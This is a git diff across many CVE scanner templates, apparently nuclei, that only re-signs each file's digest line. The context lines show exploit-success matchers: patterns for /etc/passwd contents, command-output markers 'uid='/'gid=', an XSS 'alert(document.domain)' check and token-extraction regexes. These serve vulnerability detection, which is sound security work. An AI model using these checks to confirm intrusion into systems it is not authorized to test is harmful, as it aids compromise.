4a0a00473045022100c49434d3219e961bf9b3a2986f638e7217defeb346998ca398332577bb611a360220485c16c30e0970e454110ae41a21d5031534d48c954adceb05a6f5f92ba5f568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index 87d67af3ce..5887f56639 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -116,4 +116,4 @@ http: regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true -# digest: 490a00463044022065e6f603f0e38ded5d6d7d64b26a3c4f033fe991d1b0bd52647d1f06a8b848de02204921a44eff428087946e64109d72ce0cb050c7167e6d3b2fa2eded319790416b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046ba23acf7e691adb49f48326eda2454a03fe6b188cc7055424acab0a0f8f5a902210086729e6a1db300d9cb26325c7de9703a62f99b99b1fee762e8244852d1090129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47218.yaml b/http/cves/2023/CVE-2023-47218.yaml index 0b526d6316..2239074621 100644 --- a/http/cves/2023/CVE-2023-47218.yaml +++ b/http/cves/2023/CVE-2023-47218.yaml @@ -53,4 +53,4 @@ http: - 'contains_all(body_2, "uid=", "gid=")' - 'status_code == 200' condition: and -# digest: 490a0046304402207c91f6f27dabb2e8ec3158c1c5677a2697bf0aac61c9f7fc4f5809796f63aa65022019831152413abfd5beccfb0ff90a9c194a5ac90dec6f7b4f781be1a395042786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec7d20f744003a1c2ed7444be98278cc629581cb5099e4b67f6e133003420223022100d3c72e77322b2b66a8cbdbb608afe345f84e1fb986d6f09ec3be65cb6654952c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index cb7aeefff9..b83f741a43 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -50,4 +50,4 @@ http: - type: dsl dsl: - "contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200" -# digest: 4a0a00473045022003e7cfbeaa7a27cda4e39ced19bbf29d6114eb4e89c148c4d8f8956a1fc8796b022100dadf8e853bb7b440bac6e0475e4644ee0df1cd1950b066f615e41d2202000f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7f75b62b4a54c4be8322fbe7d82e49e4b01ee263b923a0cc09b328c1854c1790221008d52673966d0c6e8085e732fa7209a3d155068e7debc5fbc2bb389c6bd254c30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index 6ebb7cc060..aacf536e8b 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -68,4 +68,4 @@ http: regex: - "XSRF-TOKEN=([^;]+)" internal: true -# digest: 4a0a004730450221009867ad8a1d9d6ee3be61f018a8148d4cce2490309e5b9b91976fe18caa6b823d02204bde4220f162aeb9c5b07eb8c3a7a6fc0379c2b4408a5457efeabf457cb3f75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205fcff0bca02226d8721f77ef2680296485ecaa0568a076642e9814df6cbed3cb022100d0ad29dc6b9f00ecac8e36b78fcbd30a66ce73e811921b88ed3141edb35b734d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index b043a74b62..5736e9dbc0 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -71,4 +71,4 @@ http: regex: - 'name="nsp" value="(.*)">' internal: true -# digest: 4a0a0047304502204fbd6201bf925ccc24095849207a7b720d4bc11d315f598c77f8d89bf49bf70b022100dd8640ebaef3939c2317cc833a62e524308e3f0b1037da30858e14db33d28577:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220177500e88fc209aa5ccfdc735f5b72fd05d71b6fa2e2f3deda7fb6c7c649ebae02207d01edc1254186264417bc50548c356df3197114ca076afcf20ce87f3a2ddb59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index 9810fff72f..2d706d3448 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -66,4 +66,4 @@ http: part: body words: - 'faultString' -# digest: 490a0046304402204cb018d762f46c2e5e8cb350f854276c066d67c1015036226a34c6c3775f90ba022033532329a0007b50a17936c876d60125819c0ddd3c928fe9c8f7a073477f9f23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cffd4ad024f079fedf1e77fb9ec9f09eae4496a27a8a6732e46740402a17f7e4022025665fe685dae977b34841487c70fb9a0e25f9c5c81c78eab968913221e623f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index 539685ae88..fc3671a7cf 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c85400417407f6aac6df36734965deaa263220c0230c4678102057a7d2c1943022100ab418a18a583650277b037d51eae65600cc8369ba16a577d6b75ebbbccf748a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a50feff13ce9b18009d5215d25e7cf2a21d76864eb3518fdcefb76fe92c51aeb02207b79b1e42efa5c35313683ff3a74ad2e4b212a8990de7e0c6675a5c1289a7740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 096227b72e..b6f5c62688 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -71,4 +71,4 @@ http: - type: word words: - '{"issuer":' -# digest: 490a00463044022077a1993e71e5fdd1862f1a2d4aa26ebf04e622ba6bbe56becbbdec39290eaf4a022045fc84cc3e43c597238379bc66e4ff39d89c0e483283a9891d37feedd9e4328f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ef3592dc8e2983c4c97f1d4bd61621dc8b61c4b92f541ac08062246ab92e59b0220378f60f6ef825b07815efe45093361bf97001b1abe5e8048f150917a02b52861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 4a33bfc64c..40ebc73b1e 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -36,4 +36,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "List of tuitions")' condition: and -# digest: 490a0046304402204b8dd881b5a0b3f7d38c4d13a40eb9e39cc3726f383612727f6b2ee9cba71b9002204c739c7fc378e976f510cb9fe88163ebae00d114bc2fc1c226a888889e010c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f6ae325959f6e9980c9fb5f10847fe23ea52fbcce5d978c2509600679618ccb022100b55286c871e65450fa5435b371f8a2a4782fd00a309678790ff8d0c9f488a678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index 3ffd6a8b45..ffc9dbe95d 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -43,4 +43,4 @@ http: - status_code == 500 - contains(body, "Courses") condition: and -# digest: 4a0a0047304502204ad6b4b3c504339e1eeee78972bb616e3b8b37d27deb376fb167ce3bc3897c77022100f2b344f17ba4ddc98660eb960d6550db34f15aa659a920ef055b0545daf67cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e23faf9f838b029cd0f20140f8f49a5ef9527f7f4167a8a157d91b3efe02991102201e489e7e00fe8cffa6a8f05e848f7897cb133419ac2b4b50d1e79ded662667a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-49785.yaml b/http/cves/2023/CVE-2023-49785.yaml index c0272ab872..83d09706b7 100644 --- a/http/cves/2023/CVE-2023-49785.yaml +++ b/http/cves/2023/CVE-2023-49785.yaml @@ -43,4 +43,4 @@ http: - contains(header_2,'X-Interactsh-Version') - contains(interactsh_protocol_2,'dns') condition: and -# digest: 4a0a004730450220044ba08dbbf92281a704e216fb48e6c232f709b05709515bc4ad70388bea4317022100a9e4de43629f0f51e429598a924f63d6133561711039b0e3b7ca1cdeb64e7895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f5f4fba67fb181f704f72f18c9db6666aa2ff4859a5509c3338dba108adaf28022100ad3687eb82d2a9dfe75eb024c74ec79198c01a339f73d1c40b0420240c68dfae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index bc43c29665..1fc02e1c68 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd156a20bbfa2b8fcbab364a68192646c450da886c638558ab7c88166483aa44022100d58dac4f441a368fc420c322d67aef9bfeecadc03665b62bf18dc363f7421566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f09b3ed688a57aab5952bc84129c5a4465f1d37462afe7b11f99697de9611f67022100cb0ed6fbee8c0c97a590626b51b036e3f5365e5b7f09b03da4eb88aea294d47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index e62cd38424..839282aa43 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab90dd8cf4551a04f3e326cc482e51353c3f2f56a1df3d185a4c5339cb15443302205dca7fcd5ff9fe5fe740d2681a563cebd4075d41d70f97abad4c7d2ae2e4f160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfc250b821506c211571ede1dc2ed5a1a66df436723ab98c40b9002c978410fa022100c47b941c9ef9a9b77e73bbf54e94a9ab5a094e082906629c36ae0f7bb6b2bca7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 0a9a14c4a2..63b4dbf8b0 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -44,4 +44,4 @@ http: - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")' - 'contains(header, "application/json")' condition: and -# digest: 4b0a00483046022100df91a0e799ab437aded5b1e9356b00c8a63803525cd7a4b511a6a90c80fe4c58022100eb14a4a52eac5c1d7dceaf823ff1aab3ad05bd419e17aac856014de6121c5f37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083ee5a70d6d846d46a8a5c2535079e54eccffdf1fa56db089bfc98c4147489e3022100a8f4230b9de5251d69eec17c7c526742b63fe1a5079f762b42682e55ba8d3df8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index 0e7d731d2a..a17f063362 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -49,4 +49,4 @@ http: - type: kval kval: - location -# digest: 4b0a00483046022100fd7d861e3f17c0f6e97ee8e723140f3d0c5ec3a282c2dd21b03bf8892b75221502210096307b8b6a2f292b107ed285cffa2143500095d5beca7867a0488e3b1ca6b8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207db7ae441786fbebf18a414fee3d3e486b2ce38371190925dba05c23476e55d1022009064d5fee882083e93c3d32c243affcca26d3840da6978d01aa971db1a33c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 1fdec9b021..3ff945baf1 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220595b1f4c2aad492c7ab53117f7f5878c7d2174357e2700274d277e89dc4b74c5022100ec8ce13cf48cb89871ddb8f797b38eb2776b8811e860285e586747386d5158c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a6564b18f0e91dbe2165e265eccd7fe7ef54753da65860b5b49b86fd2640ed802206b0218a9b2b042f7f703672a5aa1d2e3ca94454c0f76c916297587805f66de3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index 154cbf4add..047939bafb 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -62,4 +62,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4b0a00483046022100ac3f5290f42a5505e64248fbfea21473f85564876a36a8cec075997c1c32c826022100ce68660c0cd23db374c20b2912451c2339332565ce61a6375edb5e9d85761e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b358974140cef5e64159e41dd88e9e6711e0128c881498abb4c9787908e34c0d0221008557ca55d44a27fe6782e05449297d70607e1ad828f4d719347cbd72a7af7496:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index 3907840d23..fcdac6e0b3 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -48,4 +48,4 @@ http: part: header words: - 'OFBiz.Visitor=' -# digest: 4a0a0047304502203c57270ab59d7bb994c9c151f2d2fd77583f905570eabb408ebd6b13be0cb769022100f9c9673ed3529407d3fc42ccf9af89de53dae6afa4b72b939c0ad1c2c4a1e6bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfe4f5f4220b14117763d806483b72e44e845e9457d667f7d08ec0552d0a6fe70220246d0404fcaaaa2eb000ca2831d3689ca1b8d5c4fa08e6ffdaf7ef2d0f49a15e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index 8a3512d641..3f002294c4 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -70,4 +70,4 @@ http: regex: - '' internal: true -# digest: 4a0a00473045022044f10a2ac5ef090fdbe4307044fba2814a499e32ea22d76b1574a346ff2ca1e0022100c28977b6ba6dea5cd3cc95c633cb2e6d9f06fafaf15d1a9a7ec2f5ffc35c278f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055cf43348ae2d63666b5df455c64e1cc6ba5376a436ef70aea9f378a1714e70502207454984aa299e330fdd118ac85364b81ed89c9af687b1d18b0544742f73430b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index 19f3a9805d..ed253e3a45 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "alert(document.domain)", "microweber")' condition: and -# digest: 4a0a0047304502205e0b75159b6a35f3ba0a932e91972202bf83f4a1e487767247e555cf6f735881022100e1e2601bf631df27268a7b8b3d603b8a3d9e13d8d8f11a1a45da6003b4be53d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e016fc0a7b44a3a1885471355c0a4d24584d942a24fc88617370a727129a30c602206c38f0ad7918ebea610779e419bee24b5040a2382bdcc0fbabfeee26a84a2561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 9f2a231ddf..d75b685551 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -90,4 +90,4 @@ http: regex: - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php' internal: true -# digest: 4a0a0047304502204665cabc6c8c44c3492f9c39c134e9b8c31ea03dbf553b0a56e0fcf05e55bb250221008335b09068b0bd294ca32ba10a94b16b44feb5888b2edf5f8d95651af7ef79ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecc02e14e699cb2527c3ced6d5491e5c900a65de2dfa04098e53be87b1d38f360220425fbf0adbafce13c5c0c2558453f0d6dd81dbad1eb256caa6ce304281b74633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 9f508251d1..4665d7d733 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' -# digest: 4a0a00473045022076e656e11cb00070c5a59a08ecaad48f28beabbdfe91944e5eb2a824ca06d899022100fbd1daa4c3844c157f8a9bea25711e36c07267fe37ab3ea314e233bc14f0ea8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adf80dbae3063d1c8914173cf09b200f59b74231ab14a65f5cbe8bc6bb04c4f5022100c7054098ab7e244fd8edc9b92ff8a67ed416ba75b114d45c2d275b1ac7e7e359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index 059474be63..2f8d4d5226 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -99,4 +99,4 @@ http: regex: - '\/workspace\/([0-9]+)\?scriptNonce=' internal: true -# digest: 490a0046304402206ef468fce96e52210ef42ebedc016c173ff1a4381437ae9e2a655261988f671d022077243b6d2ccb046199a4b226cd7d97dff9dd6a24578ac0cca33657a26c70ad63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a1252c91302fdb2e415894f2edb3ce9ddca2782343db2834dafd615c2f2ccd0022100ff34726baa2c011bbb80010f936f106079be1d9b91b57e064f5408d8ce7432b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index 7a1fd69f82..ff1e8c9e4e 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -62,4 +62,4 @@ http: part: body words: - '"Authorized":false' -# digest: 4a0a00473045022100e96e3f0489d007a9f47fac7ecf08b3760876b4ebe8ef9c9dd87c547303c2c9e5022073cd8996d518b5055d0c7e2c678f6e6f859a6ea0738f651b4389e54edf538ec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201db35b1cbbaf04fd779f6cba94aa775c094313d177ffd35c9020614d6d4d3ede02206aafe4e7ec826b62c6e7875a4f4269ea537ddb79dc6f2d0f10455a8bb6f68b21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 4ef598c820..4d4d1b6635 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "XmlException")' condition: and -# digest: 4a0a00473045022100ddcc759c821d79ce4ed8806039b80715c20472a8dbffa3eab8eaa215ff25dfc3022017cdae9fbe0dcdb9504238d98a1adc34fa3b73af7cd7cfee711288bdfef500cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100836c3a82e583dab53376372e8a4feec400f23f27175cdb8186220a18dfcc10bb022061f0bedf50d474d78c825b26a4d6ed0aaf62471723614d3384831b81ee991d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 5fd55b51f8..56f289ea71 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220014d0afbf313c77eebbf17a87a636bfffda4e29359e40ad4ca50e421977f9c0f022049fddedfdc464a6562d4ed201b1cac4fb18011eeb933ff7d55619d9325b667ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e48798224d0152e1a3c25a11bb3f155c73b506b3f11b3a1266d80e9ddbe0add902205800bd65f60db5f4230f7efad32427f34e33704e3b2d36d8eba55a388719c0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 2a4d6687e3..817af599cd 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -69,4 +69,4 @@ http: - '"registered_model":' - '"name":' condition: and -# digest: 490a00463044022052f02e7aa3838fce1739f32e8a1da643d5788b48a35c72d756224d83d73c79000220410b9ebbb1498060027b19a08cd6f423607efad2d28b3c23a5d7b2acbf2e8bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202237b7d220fa9ba25938a5845cd7900b8a99339e3f8c0749d5eeb66fd267490102204422bcbe402037b1c99ca0738680b4fb2c61ccdd7a90f6323ad564ff9d5f8e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index 9951ee6eab..5fe2b87858 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100deec5c973c35fa67721362401e0c2701d6dd8f7d163f5d156b154fe42f891b3f02206a9d4410ff07e2f051d593e77b96f6cdcc79cd0a4e279c64e15e1db1c14ffe5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064e5166ee6da2fdd8be79992992583caec156121337bf89b14ff004331bb6d8802201016dfbf0e39ae095c915d876b1b57c3186997a91cd28c03f040fa60ca413647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 0323e7dc80..dbd612b0df 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -57,4 +57,4 @@ http: name: nodeid json: - '..|objects|.nodeId//empty[0]' -# digest: 4a0a00473045022100d4fbb382aa5dd26c05c8591f16e5c16ad8d41d3f0fc6b9960483f53288f6a1c402200ba9fd061ec61c3494888eb5dff978330e66c815347dffeb9d82acea7081967f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ceb1c44419fd44d0fa0a922fda30289e5d241940f61e7d18e23a56936d96db4f0220347ff010c1aba9d8ec613cae89ee2adb75c775e23daece9d2186d9c06e04892f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index d1cde882d8..25aacd650a 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220413ca98f296d85576af9dee2201bfc9588c0bfca659b1ed6604fd9b576a2be8202203a19defaa8d6fb92815290ba857c5e6489376eac541531ed518bab9f2ff122f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072f52b5c63da178f6fff73e03d9f0a370f6d1645f293f20fb73482cd8fa6f2ba02204502955488ad9950bc0a63a1a35fb3874dfce19ec8a5e8371cb8a8d0adb66fe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index d2d3ca90d1..0fd863efdd 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -49,4 +49,4 @@ http: - "regex('root:.*:0:0:', body_2)" - "status_code_2 == 200" condition: and -# digest: 4a0a00473045022100d23a99051d0ca3c7ed9f00df5f9dff40fc14d7bbfe4a1a21e9996fe7df89f8cb02203a1b3dbd2ab774f9296aada9f5de5d759852382066531edbe9b558c90f0e5322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206dbfed0c28b3e21350071492bcee839d9d7082a7a9d67b625426821601cf19e202205a45e1db6cb7610dfd89b63c1b98039b6c0ccf2647f9912078214cb374228410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 7bf2365ff1..a2a2062207 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -58,4 +58,4 @@ http: - 'status_code == 200' - 'contains(body, "wp-admin")' condition: and -# digest: 4b0a00483046022100f7bbc27951654dbca3bdf6a948dc356043e28efc07a03645748cfa66dbbb3300022100fe0227a802728849ed9f0a716c13e735cf9a337470c06bfc6ce3fd9ed0f4da77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034e6469fb175abf5f0ead5f467b0674899bfb4a1776a6188e97231cabcc92e7202206b25fdfb241ed91d4cee2ee05e8f798bd0bd1b0fcf6ece85993f972f331d224f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index 58107cd62a..554727c555 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d57bed9f86a5c3790fab7c7ad97d0ce2a40a3769cadf8c03db9fe296816f3dc022100a72b53af19a2d49d7d48f413a62219b54ef121d6c17aa1c35758f4608f69b95f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc29a717cad3f1cee3289a56267f95133718b5524f83746d1cbe95c529f4a15d022048929c54cdc6f093d8ed3c634a2946ca4874f463759bb3ab0eb1e9df35d6e8cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index 3eb7868174..f0103e009d 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -41,4 +41,4 @@ http: - "status_code == 200" - "contains(body, '/tmp') && contains(body, 'Index of')" condition: and -# digest: 4b0a00483046022100eabf9219dc9e6989598a1e706ef63cba43186ef9f0414058760b4d431972d3b802210095d09270e8945a8668e0078e71b8b8acecd04475963e29c6561245d80492846f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022eea8235ae8015d6909cf70399d1ab466220b6ae36c3511acbb7bd3f01a463e02201e9729a0db2a9791ef37a4cc37b8219c806799e6669590f6c6149a82bb945a79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index 300106a47f..c823d8f680 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -55,4 +55,4 @@ http: - 'contains(body, "[]")' - 'duration >= 6' condition: and -# digest: 4a0a0047304502203abe044d78eb44235d24bb992c374dfd703651411e9f993f6bd4b985c6f0348d022100be46793ecec88a8ebc27e0c913ce775aa35f2697071e4d5dede66a0a59ed24b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce08a03a6aa1582532acf62f661ce5ce40afe812793118799951d4ae125d469c022100cf3856bae89445b456a8d94318817eaae079b9ab399cea89ff899639ac47e1c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index 99d03e0b53..7660993cd5 100644 